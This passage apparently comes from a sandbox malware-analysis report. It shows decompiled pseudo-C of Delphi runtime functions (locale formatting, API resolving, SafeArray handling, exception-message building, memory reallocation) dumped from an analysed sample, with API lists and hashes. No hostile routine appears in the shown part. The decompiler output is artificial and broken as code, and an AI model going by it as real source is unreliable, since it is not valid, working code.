							_t83 = ( *(_t124 + _t92 - 1) & 0x000000ff) - 0x47;
							__eflags = _t83;
							if(_t83 != 0) {
								__eflags = _t83 != 0x20;
								if(_t83 != 0x20) {
									E02724A88();
									E02724B6C(_t122, _v16);
								}
							}
							_t92 = _t92 + 1;
							__eflags = _t92;
						}
					}
				}
				L28:
				_pop(_t111);
				 *[fs:eax] = _t111;
				_push(E0272AECB);
				return E027248C4( &_v24, 4);
			}

0x0272acf4
0x0272acf9
0x0272acfa
0x0272acfb
0x0272acfc
0x0272acfd
0x0272ad01
0x0272ad03
0x0272ad07
0x0272ad08
0x0272ad0d
0x0272ad10
0x0272ad13
0x0272ad1a
0x0272ad32
0x0272ad4a
0x0272ae9a
0x0272aea1
0x0272aea3
0x00000000
0x00000000
0x0272adb9
0x0272adc0
0x0272adfe
0x0272ae03
0x0272ae05
0x0272ae27
0x0272ae2c
0x0272ae2e
0x0272ae4f
0x0272ae54
0x0272ae56
0x0272ae6c
0x0272ae6c
0x0272ae6e
0x0272ae74
0x0272ae7b
0x0272ae70
0x0272ae70
0x0272ae72
0x0272ae8a
0x0272ae94
0x00000000
0x00000000
0x00000000
0x0272ae72
0x0272ae58
0x0272ae5f
0x0272ae64
0x0272ae64
0x0272ae30
0x0272ae37
0x0272ae3c
0x0272ae3c
0x0272ae07
0x0272ae0e
0x0272ae13
0x0272ae13
0x0272ae99
0x0272ae99
0x0272adc2
0x0272adcb
0x0272add9
0x0272ade3
0x0272ade8
0x0272ade8
0x0272adc0
0x0272ad50
0x0272ad50
0x0272ad55
0x0272ad58
0x0272ad66
0x0272ad62
0x0272ad62
0x0272ad62
0x0272ad6a
0x0272ada7
0x0272ad6c
0x0272ad93
0x0272ad73
0x0272ad73
0x0272ad75
0x0272ad77
0x0272ad79
0x0272ad83
0x0272ad8d
0x0272ad8d
0x0272ad79
0x0272ad92
0x0272ad92
0x0272ad92
0x0272ad9e
0x0272ad6a
0x0272aea9
0x0272aeab
0x0272aeae
0x0272aeb1
0x0272aec3

APIs

GetThreadLocale.KERNEL32(?,00000000,0272AEC4,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0272AD23

Part of subcall function 0272A9B8: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0272A9D6

Strings

eeee, xrefs: 0272AE32
ggg, xrefs: 0272AE09
yyyy, xrefs: 0272AE19

Memory Dump Source

Source File: 00000000.00000002.278297095.0000000002721000.00000020.00001000.00020000.00000000.sdmp, Offset: 02720000, based on PE: true

Associated: 00000000.00000002.278292760.0000000002720000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.278330937.0000000002740000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2720000_SecuriteInfo.jbxd

Similarity

API ID: Locale$InfoThread
String ID: eeee$ggg$yyyy
API String ID: 4232894706-1253427255
Opcode ID: 65586b65bb842ea12cc93c32d582d5fdc2190bf77adb87985bf88f2e91dbbaa8
Instruction ID: 03ec9771b5ae9f785235a44363e2a738f95bea1d2da68eb3cf04c382c1f32224
Opcode Fuzzy Hash: 65586b65bb842ea12cc93c32d582d5fdc2190bf77adb87985bf88f2e91dbbaa8
Instruction Fuzzy Hash: 67410575B042359BC713EABA88957BEB3EBDB85301F50442AD4C1D7348DA34DE0F8A65

Uniqueness

Uniqueness Score: -1.00%

Function 0272C620 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0272C620() {
				_Unknown_base(*)()* _t1;
				struct HINSTANCE__* _t3;

				_t1 = GetModuleHandleA("kernel32.dll");
				_t3 = _t1;
				if(_t3 != 0) {
					_t1 = GetProcAddress(_t3, "GetDiskFreeSpaceExA");
					 *0x2740850 = _t1;
				}
				if( *0x2740850 == 0) {
					 *0x2740850 = E0272823C;
					return E0272823C;
				}
				return _t1;
			}

0x0272c626
0x0272c62b
0x0272c62f
0x0272c637
0x0272c63c
0x0272c63c
0x0272c648
0x0272c64f
0x00000000
0x0272c64f
0x0272c655

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,?,0273F10B,00000000,0273F11E), ref: 0272C626
GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 0272C637

Strings

GetDiskFreeSpaceExA, xrefs: 0272C631
kernel32.dll, xrefs: 0272C621

Memory Dump Source

Source File: 00000000.00000002.278297095.0000000002721000.00000020.00001000.00020000.00000000.sdmp, Offset: 02720000, based on PE: true

Associated: 00000000.00000002.278292760.0000000002720000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.278330937.0000000002740000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2720000_SecuriteInfo.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: GetDiskFreeSpaceExA$kernel32.dll
API String ID: 1646373207-3712701948
Opcode ID: 662c578bc5f30d95771ee499c052403ef742802e6e2a0a411d8c48dcc2a5aa40
Instruction ID: ef0fc92002730cc4206643fa8ea0aff8c1628bc75bebac6d082b084120732512
Opcode Fuzzy Hash: 662c578bc5f30d95771ee499c052403ef742802e6e2a0a411d8c48dcc2a5aa40
Instruction Fuzzy Hash: 6AD05EF0A803A04AFB167EA4598661937DCA724240F52242FD20165600C770441C8F50

Uniqueness

Uniqueness Score: -1.00%

Function 0272E33C Relevance: 6.1, APIs: 4, Instructions: 115
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E0272E33C(signed short* __eax) {
				char _v260;
				char _v768;
				char _v772;
				signed short* _v776;
				signed short* _v780;
				char _v784;
				signed int _v788;
				char _v792;
				intOrPtr* _v796;
				signed char _t43;
				intOrPtr* _t60;
				void* _t79;
				void* _t81;
				void* _t84;
				void* _t85;
				intOrPtr* _t92;
				void* _t96;
				char* _t97;
				void* _t98;

				_v776 = __eax;
				if((_v776[0] & 0x00000020) == 0) {
					E0272E21C(0x80070057);
				}
				_t43 =  *_v776 & 0x0000ffff;
				if((_t43 & 0x00000fff) == 0xc) {
					if((_t43 & 0x00000040) == 0) {
						_v780 = _v776[4];
					} else {
						_v780 =  *(_v776[4]);
					}
					_v788 =  *_v780 & 0x0000ffff;
					_t79 = _v788 - 1;
					if(_t79 >= 0) {
						_t85 = _t79 + 1;
						_t96 = 0;
						_t97 =  &_v772;
						do {
							_v796 = _t97;
							_push(_v796 + 4);
							_t22 = _t96 + 1; // 0x1
							_push(_v780);
							L0272D43C();
							E0272E21C(_v780);
							_push( &_v784);
							_t25 = _t96 + 1; // 0x1
							_push(_v780);
							L0272D444();
							E0272E21C(_v780);
							 *_v796 = _v784 -  *((intOrPtr*)(_v796 + 4)) + 1;
							_t96 = _t96 + 1;
							_t97 = _t97 + 8;
							_t85 = _t85 - 1;
						} while (_t85 != 0);
					}
					_t81 = _v788 - 1;
					if(_t81 >= 0) {
						_t84 = _t81 + 1;
						_t60 =  &_v768;
						_t92 =  &_v260;
						do {
							 *_t92 =  *_t60;
							_t92 = _t92 + 4;
							_t60 = _t60 + 8;
							_t84 = _t84 - 1;
						} while (_t84 != 0);
						do {
							goto L12;
						} while (E0272E2E0(_t83, _t98) != 0);
						goto L15;
					}
					L12:
					_t83 = _v788 - 1;
					if(E0272E2B0(_v788 - 1, _t98) != 0) {
						_push( &_v792);
						_push( &_v260);
						_push(_v780);
						L0272D44C();
						E0272E21C(_v780);
						E0272E534(_v792);
					}
				}
				L15:
				_push(_v776);
				L0272CFD4();
				return E0272E21C(_v776);
			}

0x0272e348
0x0272e358
0x0272e35f
0x0272e35f
0x0272e36a
0x0272e378
0x0272e387
0x0272e3a5
0x0272e389
0x0272e394
0x0272e394
0x0272e3b4
0x0272e3c0
0x0272e3c3
0x0272e3c5
0x0272e3c6
0x0272e3c8
0x0272e3ce
0x0272e3d0
0x0272e3df
0x0272e3e0
0x0272e3ea
0x0272e3eb
0x0272e3f0
0x0272e3fb
0x0272e3fc
0x0272e406
0x0272e407
0x0272e40c
0x0272e427
0x0272e429
0x0272e42a
0x0272e42d
0x0272e42d
0x0272e3ce
0x0272e436
0x0272e439
0x0272e43b
0x0272e43c
0x0272e442
0x0272e448
0x0272e44a
0x0272e44c
0x0272e44f
0x0272e452
0x0272e452
0x0272e455
0x00000000
0x00000000
0x00000000
0x0272e455
0x0272e455
0x0272e45c
0x0272e467
0x0272e46f
0x0272e476
0x0272e47d
0x0272e47e
0x0272e483
0x0272e48e
0x0272e48e
0x0272e49c
0x0272e4a0
0x0272e4a6
0x0272e4a7
0x0272e4b7

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0272E3EB
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0272E407
SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0272E47E
VariantClear.OLEAUT32(?), ref: 0272E4A7

Memory Dump Source

Source File: 00000000.00000002.278297095.0000000002721000.00000020.00001000.00020000.00000000.sdmp, Offset: 02720000, based on PE: true

Associated: 00000000.00000002.278292760.0000000002720000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.278330937.0000000002740000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2720000_SecuriteInfo.jbxd

Similarity

API ID: ArraySafe$Bound$ClearIndexVariant
String ID:
API String ID: 920484758-0
Opcode ID: 88686fe7731b7c03f03ace40aaed8d38b50d90d6747c96ad40a312f6e176089f
Instruction ID: e8b49a2dcf0215f16cbfd9d83f04cc24a45e6f69979c0b18db0946118b72379c
Opcode Fuzzy Hash: 88686fe7731b7c03f03ace40aaed8d38b50d90d6747c96ad40a312f6e176089f
Instruction Fuzzy Hash: 4F412875A006298FCB62DF58CC94BD9B3FDAF48314F0041D5E649A7212DA34BF888F64

Uniqueness

Uniqueness Score: -1.00%

Function 0272AF30 Relevance: 6.1, APIs: 4, Instructions: 102
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0272AF30(intOrPtr* __eax, intOrPtr __ecx, void* __edx, void* __fp0, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v273;
				char _v534;
				char _v790;
				struct _MEMORY_BASIC_INFORMATION _v820;
				char _v824;
				intOrPtr _v828;
				char _v832;
				intOrPtr _v836;
				char _v840;
				intOrPtr _v844;
				char _v848;
				char* _v852;
				char _v856;
				char _v860;
				char _v1116;
				void* __edi;
				struct HINSTANCE__* _t40;
				intOrPtr _t51;
				struct HINSTANCE__* _t53;
				void* _t69;
				void* _t73;
				intOrPtr _t74;
				intOrPtr _t83;
				intOrPtr _t86;
				intOrPtr* _t87;
				void* _t93;

				_t93 = __fp0;
				_v8 = __ecx;
				_t73 = __edx;
				_t87 = __eax;
				VirtualQuery(__edx,  &_v820, 0x1c);
				if(_v820.State != 0x1000 || GetModuleFileNameA(_v820.AllocationBase,  &_v534, 0x105) == 0) {
					_t40 =  *0x27437f0; // 0x2720000
					GetModuleFileNameA(_t40,  &_v534, 0x105);
					_v12 = E0272AF24(_t73);
				} else {
					_v12 = _t73 - _v820.AllocationBase;
				}
				E027282F4( &_v273, 0x104, E0272BDD8( &_v534, 0x5c) + 1);
				_t74 = 0x272b0b0;
				_t86 = 0x272b0b0;
				_t83 =  *0x2726d64; // 0x2726db0
				if(E02723DEC(_t87, _t83) != 0) {
					_t74 = E02724D64( *((intOrPtr*)(_t87 + 4)));
					_t69 = E027282CC(_t74, 0x272b0b0);
					if(_t69 != 0 &&  *((char*)(_t74 + _t69 - 1)) != 0x2e) {
						_t86 = 0x272b0b4;
					}
				}
				_t51 =  *0x2740edc; // 0x2726b4c
				_t16 = _t51 + 4; // 0xffe8
				_t53 =  *0x27437f0; // 0x2720000
				LoadStringA(E02725AF0(_t53),  *_t16,  &_v790, 0x100);
				E02723BD8( *_t87,  &_v1116);
				_v860 =  &_v1116;
				_v856 = 4;
				_v852 =  &_v273;
				_v848 = 6;
				_v844 = _v12;
				_v840 = 5;
				_v836 = _t74;
				_v832 = 6;
				_v828 = _t86;
				_v824 = 6;
				E02728814(_v8,  &_v790, _a4, _t93, 4,  &_v860);
				return E027282CC(_v8, _t86);
			}

0x0272af30
0x0272af3c
0x0272af3f
0x0272af41
0x0272af4d
0x0272af5c
0x0272af86
0x0272af8c
0x0272af98
0x0272af9d
0x0272afa3
0x0272afa3
0x0272afc1
0x0272afc6
0x0272afcb
0x0272afd2
0x0272afdf
0x0272afe9
0x0272afed
0x0272aff4
0x0272affd
0x0272affd
0x0272aff4
0x0272b00e
0x0272b013
0x0272b017
0x0272b022
0x0272b02f
0x0272b03a
0x0272b040
0x0272b04d
0x0272b053
0x0272b05d
0x0272b063
0x0272b06a
0x0272b070
0x0272b077
0x0272b07d
0x0272b099
0x0272b0ac

APIs

VirtualQuery.KERNEL32(?,?,0000001C), ref: 0272AF4D
GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0272AF71
GetModuleFileNameA.KERNEL32(02720000,?,00000105), ref: 0272AF8C
LoadStringA.USER32 ref: 0272B022

Memory Dump Source

Source File: 00000000.00000002.278297095.0000000002721000.00000020.00001000.00020000.00000000.sdmp, Offset: 02720000, based on PE: true

Associated: 00000000.00000002.278292760.0000000002720000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.278330937.0000000002740000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2720000_SecuriteInfo.jbxd

Similarity

API ID: FileModuleName$LoadQueryStringVirtual
String ID:
API String ID: 3990497365-0
Opcode ID: bec41842e48f5237da18fa69aca4c0b0db890f347d24e75b1b73bb6fcab4ff32
Instruction ID: 831c860fa5746ab2bfec0905bd1da8acfa9999c47b7fd0f0ef93294be66f032c
Opcode Fuzzy Hash: bec41842e48f5237da18fa69aca4c0b0db890f347d24e75b1b73bb6fcab4ff32
Instruction Fuzzy Hash: AD414E71A002689BDB22DB68CC88BDAB7FDAB18304F0450E6E548E7241D775AF88CF51

Uniqueness

Uniqueness Score: -1.00%

Function 0272AF2E Relevance: 6.1, APIs: 4, Instructions: 101
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0272AF2E(intOrPtr* __eax, intOrPtr __ecx, void* __edx, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v273;
				char _v534;
				char _v790;
				struct _MEMORY_BASIC_INFORMATION _v820;
				char _v824;
				intOrPtr _v828;
				char _v832;
				intOrPtr _v836;
				char _v840;
				intOrPtr _v844;
				char _v848;
				char* _v852;
				char _v856;
				char _v860;
				char _v1116;
				void* __edi;
				struct HINSTANCE__* _t40;
				intOrPtr _t51;
				struct HINSTANCE__* _t53;
				void* _t69;
				void* _t74;
				intOrPtr _t75;
				intOrPtr _t85;
				intOrPtr _t89;
				intOrPtr* _t92;
				void* _t105;

				_v8 = __ecx;
				_t74 = __edx;
				_t92 = __eax;
				VirtualQuery(__edx,  &_v820, 0x1c);
				if(_v820.State != 0x1000 || GetModuleFileNameA(_v820.AllocationBase,  &_v534, 0x105) == 0) {
					_t40 =  *0x27437f0; // 0x2720000
					GetModuleFileNameA(_t40,  &_v534, 0x105);
					_v12 = E0272AF24(_t74);
				} else {
					_v12 = _t74 - _v820.AllocationBase;
				}
				E027282F4( &_v273, 0x104, E0272BDD8( &_v534, 0x5c) + 1);
				_t75 = 0x272b0b0;
				_t89 = 0x272b0b0;
				_t85 =  *0x2726d64; // 0x2726db0
				if(E02723DEC(_t92, _t85) != 0) {
					_t75 = E02724D64( *((intOrPtr*)(_t92 + 4)));
					_t69 = E027282CC(_t75, 0x272b0b0);
					if(_t69 != 0 &&  *((char*)(_t75 + _t69 - 1)) != 0x2e) {
						_t89 = 0x272b0b4;
					}
				}
				_t51 =  *0x2740edc; // 0x2726b4c
				_t16 = _t51 + 4; // 0xffe8
				_t53 =  *0x27437f0; // 0x2720000
				LoadStringA(E02725AF0(_t53),  *_t16,  &_v790, 0x100);
				E02723BD8( *_t92,  &_v1116);
				_v860 =  &_v1116;
				_v856 = 4;
				_v852 =  &_v273;
				_v848 = 6;
				_v844 = _v12;
				_v840 = 5;
				_v836 = _t75;
				_v832 = 6;
				_v828 = _t89;
				_v824 = 6;
				E02728814(_v8,  &_v790, _a4, _t105, 4,  &_v860);
				return E027282CC(_v8, _t89);
			}

0x0272af3c
0x0272af3f
0x0272af41
0x0272af4d
0x0272af5c
0x0272af86
0x0272af8c
0x0272af98
0x0272af9d
0x0272afa3
0x0272afa3
0x0272afc1
0x0272afc6
0x0272afcb
0x0272afd2
0x0272afdf
0x0272afe9
0x0272afed
0x0272aff4
0x0272affd
0x0272affd
0x0272aff4
0x0272b00e
0x0272b013
0x0272b017
0x0272b022
0x0272b02f
0x0272b03a
0x0272b040
0x0272b04d
0x0272b053
0x0272b05d
0x0272b063
0x0272b06a
0x0272b070
0x0272b077
0x0272b07d
0x0272b099
0x0272b0ac

APIs

VirtualQuery.KERNEL32(?,?,0000001C), ref: 0272AF4D
GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0272AF71
GetModuleFileNameA.KERNEL32(02720000,?,00000105), ref: 0272AF8C
LoadStringA.USER32 ref: 0272B022

Memory Dump Source

Source File: 00000000.00000002.278297095.0000000002721000.00000020.00001000.00020000.00000000.sdmp, Offset: 02720000, based on PE: true

Associated: 00000000.00000002.278292760.0000000002720000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.278330937.0000000002740000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2720000_SecuriteInfo.jbxd

Similarity

API ID: FileModuleName$LoadQueryStringVirtual
String ID:
API String ID: 3990497365-0
Opcode ID: 39b0cf3276ba22fbfeff16179af6ebb4b109faffe4465bd7448ebb78b743f830
Instruction ID: 9ca07d6cd4d951669fe7b3bc5adfdda0d8236e61fa68d4ef65add353fb6b4f3b
Opcode Fuzzy Hash: 39b0cf3276ba22fbfeff16179af6ebb4b109faffe4465bd7448ebb78b743f830
Instruction Fuzzy Hash: A9415071A002689BDB22DB68CC84BDAB7FDAB18304F0440E6E548E7241D775AF88CF51

Uniqueness

Uniqueness Score: -1.00%

Function 02721C9C Relevance: 5.3, APIs: 4, Instructions: 330
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E02721C9C(signed int __eax, signed int __edx, void* __edi) {
				signed int _t58;
				signed int _t73;
				signed int _t80;
				signed int _t86;
				signed int _t94;
				signed int _t100;
				void* _t102;
				signed int _t111;
				signed int _t119;
				signed int _t125;
				signed int _t131;
				signed int _t133;
				signed int _t136;
				intOrPtr _t139;
				void* _t141;
				signed int _t143;
				signed int _t145;
				unsigned int _t146;
				signed int _t153;
				unsigned int _t154;
				intOrPtr _t157;
				void* _t160;
				intOrPtr _t168;
				intOrPtr _t170;
				signed int _t173;
				signed int _t174;
				signed int _t175;
				void* _t182;
				unsigned int _t184;
				signed int _t190;
				signed int _t193;
				signed int _t195;
				signed int _t196;
				signed int _t198;
				void* _t202;
				signed int _t203;
				signed int _t204;
				void* _t205;
				signed int _t208;

				_t181 = __edi;
				_t166 = __edx;
				_t145 =  *(__eax - 4);
				_t196 = __eax;
				if((_t145 & 0x00000007) != 0) {
					__eflags = _t145 & 0x00000005;
					if((_t145 & 0x00000005) != 0) {
						__eflags = _t145 & 0x00000003;
						if((_t145 & 0x00000003) != 0) {
							__eflags = 0;
							return 0;
						} else {
							_t146 = _t145 - 0x18;
							__eflags = __edx - _t146;
							if(__edx <= _t146) {
								__eflags = __edx - _t146 >> 1;
								if(__edx < _t146 >> 1) {
									_t131 = __edx;
									_t58 = E02721754(__edx);
									__eflags = _t58;
									if(_t58 == 0) {
										goto L61;
									} else {
										__eflags = _t131 - 0x40a2c;
										if(_t131 > 0x40a2c) {
											 *((intOrPtr*)(_t58 - 8)) = _t131;
										}
										E027214D4(_t196, _t131, _t58);
										E02721ABC(_t196, _t181);
										return _t58;
									}
								} else {
									 *((intOrPtr*)(__eax - 8)) = __edx;
									return __eax;
								}
							} else {
								asm("adc eax, 0xffffffff");
								_t133 = (0 & (_t146 >> 0x00000002) + _t146 - __edx) + __edx;
								_push(__edx);
								_t58 = E02721754((0 & (_t146 >> 0x00000002) + _t146 - __edx) + __edx);
								_pop(_t168);
								__eflags = _t58;
								if(_t58 != 0) {
									__eflags = _t133 - 0x40a2c;
									if(_t133 > 0x40a2c) {
										 *((intOrPtr*)(_t58 - 8)) = _t168;
									}
									E027214A4(_t196,  *((intOrPtr*)(_t196 - 8)), _t58);
									E02721ABC(_t196, _t181);
									return _t58;
								}
								L61:
								return _t58;
							}
						}
					} else {
						_t153 = _t145 & 0xfffffff0;
						_push(__edi);
						_t182 = _t153 + __eax;
						_t154 = _t153 - 4;
						_t136 = _t145 & 0x0000000f;
						__eflags = __edx - _t154;
						if(__edx > _t154) {
							_t73 =  *(_t182 - 4);
							__eflags = _t73 & 0x00000001;
							if((_t73 & 0x00000001) == 0) {
								L51:
								asm("adc edi, 0xffffffff");
								_t198 = ((_t154 >> 0x00000002) + _t154 - _t166 & 0) + _t166;
								_t184 = _t154;
								_t80 = E02721754(((_t154 >> 0x00000002) + _t154 - _t166 & 0) + _t166);
								_t170 = _t166;
								__eflags = _t80;
								if(_t80 == 0) {
									goto L49;
								} else {
									__eflags = _t198 - 0x40a2c;
									if(_t198 > 0x40a2c) {
										 *((intOrPtr*)(_t80 - 8)) = _t170;
									}
									E027214A4(_t196, _t184, _t80);
									E02721ABC(_t196, _t184);
									return _t80;
								}
							} else {
								_t86 = _t73 & 0xfffffff0;
								_t202 = _t154 + _t86;
								__eflags = __edx - _t202;
								if(__edx > _t202) {
									goto L51;
								} else {
									__eflags =  *0x2741045;
									if(__eflags == 0) {
										L42:
										__eflags = _t86 - 0xb30;
										if(_t86 >= 0xb30) {
											E027214F0(_t182);
											_t166 = _t166;
											_t154 = _t154;
										}
										asm("adc edi, 0xffffffff");
										_t94 = (_t166 + ((_t154 >> 0x00000002) + _t154 - _t166 & 0) + 0x000000d3 & 0xffffff00) + 0x30;
										_t173 = _t202 + 4 - _t94;
										__eflags = _t173;
										if(_t173 > 0) {
											 *(_t196 + _t202 - 4) = _t173;
											 *((intOrPtr*)(_t196 - 4 + _t94)) = _t173 + 3;
											_t203 = _t94;
											__eflags = _t173 - 0xb30;
											if(_t173 >= 0xb30) {
												__eflags = _t94 + _t196;
												E02721530(_t94 + _t196, _t154, _t173);
											}
										} else {
											 *(_t196 + _t202) =  *(_t196 + _t202) & 0xfffffff7;
											_t203 = _t202 + 4;
										}
										_t204 = _t203 | _t136;
										__eflags = _t204;
										 *(_t196 - 4) = _t204;
										 *0x2741710 = 0;
										_t80 = _t196;
										L49:
										return _t80;
									} else {
										while(1) {
											asm("lock cmpxchg [0x2741710], ah");
											if(__eflags == 0) {
												break;
											}
											Sleep(0);
											_t166 = _t166;
											_t154 = _t154;
											asm("lock cmpxchg [0x2741710], ah");
											if(__eflags != 0) {
												Sleep(0xa);
												_t166 = _t166;
												_t154 = _t154;
												continue;
											}
											break;
										}
										_t136 = 0x0000000f &  *(_t196 - 4);
										_t100 =  *(_t182 - 4);
										__eflags = _t100 & 0x00000001;
										if((_t100 & 0x00000001) == 0) {
											L50:
											 *0x2741710 = 0;
											goto L51;
										} else {
											_t86 = _t100 & 0xfffffff0;
											_t202 = _t154 + _t86;
											__eflags = _t166 - _t202;
											if(_t166 > _t202) {
												goto L50;
											} else {
												goto L42;
											}
										}
									}
								}
							}
						} else {
							_t205 = __edx + __edx;
							__eflags = _t205 - _t154;
							if(_t205 < _t154) {
								__eflags = __edx - 0xb2c;
								if(__edx >= 0xb2c) {
									L19:
									_t16 = _t166 + 0xd3; // 0xbff
									_t208 = (_t16 & 0xffffff00) + 0x30;
									_t157 = _t154 + 4 - _t208;
									__eflags =  *0x2741045;
									if(__eflags != 0) {
										while(1) {
											asm("lock cmpxchg [0x2741710], ah");
											if(__eflags == 0) {
												break;
											}
											Sleep(0);
											_t157 = _t157;
											asm("lock cmpxchg [0x2741710], ah");
											if(__eflags != 0) {
												Sleep(0xa);
												_t157 = _t157;
												continue;
											}
											break;
										}
										_t136 = 0x0000000f &  *(_t196 - 4);
										__eflags = 0xf;
									}
									 *(_t196 - 4) = _t136 | _t208;
									_t139 = _t157;
									_t174 =  *(_t182 - 4);
									__eflags = _t174 & 0x00000001;
									if((_t174 & 0x00000001) != 0) {
										_t102 = _t182;
										_t175 = _t174 & 0xfffffff0;
										_t139 = _t139 + _t175;
										_t182 = _t182 + _t175;
										__eflags = _t175 - 0xb30;
										if(_t175 >= 0xb30) {
											E027214F0(_t102);
										}
									} else {
										 *(_t182 - 4) = _t174 | 0x00000008;
									}
									 *((intOrPtr*)(_t182 - 8)) = _t139;
									 *((intOrPtr*)(_t196 + _t208 - 4)) = _t139 + 3;
									__eflags = _t139 - 0xb30;
									if(_t139 >= 0xb30) {
										E02721530(_t196 + _t208, _t157, _t139);
									}
									 *0x2741710 = 0;
									return _t196;
								} else {
									__eflags = _t205 - 0xb2c;
									if(_t205 < 0xb2c) {
										_t190 = __edx;
										_t111 = E02721754(__edx);
										__eflags = _t111;
										if(_t111 != 0) {
											E027214D4(_t196, _t190, _t111);
											E02721ABC(_t196, _t190);
										}
										return _t111;
									} else {
										_t166 = 0xb2c;
										goto L19;
									}
								}
							} else {
								return __eax;
							}
						}
					}
				} else {
					_t141 =  *_t145;
					_t160 = ( *(_t141 + 2) & 0x0000ffff) - 4;
					if(_t160 < __edx) {
						_push(__edi);
						_t193 = __edx;
						asm("adc eax, 0xffffffff");
						_t119 = E02721754((0 & _t160 + _t160 + 0x00000020 - __edx) + __edx);
						__eflags = _t119;
						if(_t119 != 0) {
							__eflags = _t193 - 0x40a2c;
							if(_t193 > 0x40a2c) {
								 *((intOrPtr*)(_t119 - 8)) = _t193;
							}
							__eflags = ( *(_t141 + 2) & 0x0000ffff) - 4;
							_t195 = _t119;
							 *((intOrPtr*)(_t141 + 0x1c))();
							E02721ABC(_t196, _t195);
							_t119 = _t195;
						}
						return _t119;
					} else {
						if(0x40 + __edx * 4 < _t160) {
							_t143 = __edx;
							_t125 = E02721754(__edx);
							__eflags = _t125;
							if(_t125 != 0) {
								E027214D4(_t196, _t143, _t125);
								E02721ABC(_t196, __edi);
								return _t125;
							}
							return _t125;
						} else {
							return __eax;
						}
					}
				}
			}

0x02721c9c
0x02721c9c
0x02721c9c
0x02721ca4
0x02721ca6
0x02721d34
0x02721d37
0x02721f88
0x02721f8b
0x0272201c
0x02722020
0x02721f91
0x02721f91
0x02721f94
0x02721f96
0x02721fde
0x02721fe0
0x02721fe8
0x02721fec
0x02721ff1
0x02721ff3
0x00000000
0x02721ff5
0x02721ff5
0x02721ffb
0x02721ffd
0x02721ffd
0x02722008
0x0272200f
0x02722018
0x02722018
0x02721fe2
0x02721fe2
0x02721fe7
0x02721fe7
0x02721f98
0x02721fa3
0x02721faa
0x02721fac
0x02721fad
0x02721fb2
0x02721fb3
0x02721fb5
0x02721fb7
0x02721fbd
0x02721fbf
0x02721fbf
0x02721fcb
0x02721fd2
0x00000000
0x02721fd7
0x02721fdb
0x02721fdb
0x02721fdb
0x02721f96
0x02721d3d
0x02721d3f
0x02721d42
0x02721d43
0x02721d46
0x02721d49
0x02721d4c
0x02721d4f
0x02721e54
0x02721e57
0x02721e59
0x02721f40
0x02721f4b
0x02721f52
0x02721f54
0x02721f57
0x02721f5c
0x02721f5d
0x02721f5f
0x00000000
0x02721f61
0x02721f61
0x02721f67
0x02721f69
0x02721f69
0x02721f74
0x02721f7b
0x02721f86
0x02721f86
0x02721e5f
0x02721e5f
0x02721e62
0x02721e65
0x02721e67
0x00000000
0x02721e6d
0x02721e6d
0x02721e74
0x02721ec5
0x02721ec5
0x02721eca
0x02721ed0
0x02721ed5
0x02721ed6
0x02721ed6
0x02721ee2
0x02721ef3
0x02721ef9
0x02721ef9
0x02721efb
0x02721f08
0x02721f0f
0x02721f13
0x02721f15
0x02721f1b
0x02721f1d
0x02721f1f
0x02721f1f
0x02721efd
0x02721efd
0x02721f01
0x02721f01
0x02721f24
0x02721f24
0x02721f26
0x02721f29
0x02721f30
0x02721f32
0x02721f36
0x02721e76
0x02721e76
0x02721e7b
0x02721e83
0x00000000
0x00000000
0x02721e89
0x02721e8e
0x02721e8f
0x02721e95
0x02721e9d
0x02721ea3
0x02721ea8
0x02721ea9
0x00000000
0x02721ea9
0x00000000
0x02721e9d
0x02721eb1
0x02721eb4
0x02721eb7
0x02721eb9
0x02721f39
0x02721f39
0x00000000
0x02721ebb
0x02721ebb
0x02721ebe
0x02721ec1
0x02721ec3
0x00000000
0x00000000
0x00000000
0x00000000
0x02721ec3
0x02721eb9
0x02721e74
0x02721e67
0x02721d55
0x02721d55
0x02721d58
0x02721d5a
0x02721d64
0x02721d6a
0x02721d7d
0x02721d7d
0x02721d89
0x02721d8f
0x02721d91
0x02721d98
0x02721d9a
0x02721d9f
0x02721da7
0x00000000
0x00000000
0x02721dac
0x02721db1
0x02721db7
0x02721dbf
0x02721dc4
0x02721dc9
0x00000000
0x02721dc9
0x00000000
0x02721dbf
0x02721dd1
0x02721dd1
0x02721dd1
0x02721dd6
0x02721dd9
0x02721ddb
0x02721dde
0x02721de1
0x02721dec
0x02721dee
0x02721df1
0x02721df3
0x02721df5
0x02721dfb
0x02721dfd
0x02721dfd
0x02721de3
0x02721de6
0x02721de6
0x02721e02
0x02721e08
0x02721e0c
0x02721e12
0x02721e19
0x02721e19
0x02721e1e
0x02721e2b
0x02721d6c
0x02721d6c
0x02721d72
0x02721e2c
0x02721e30
0x02721e35
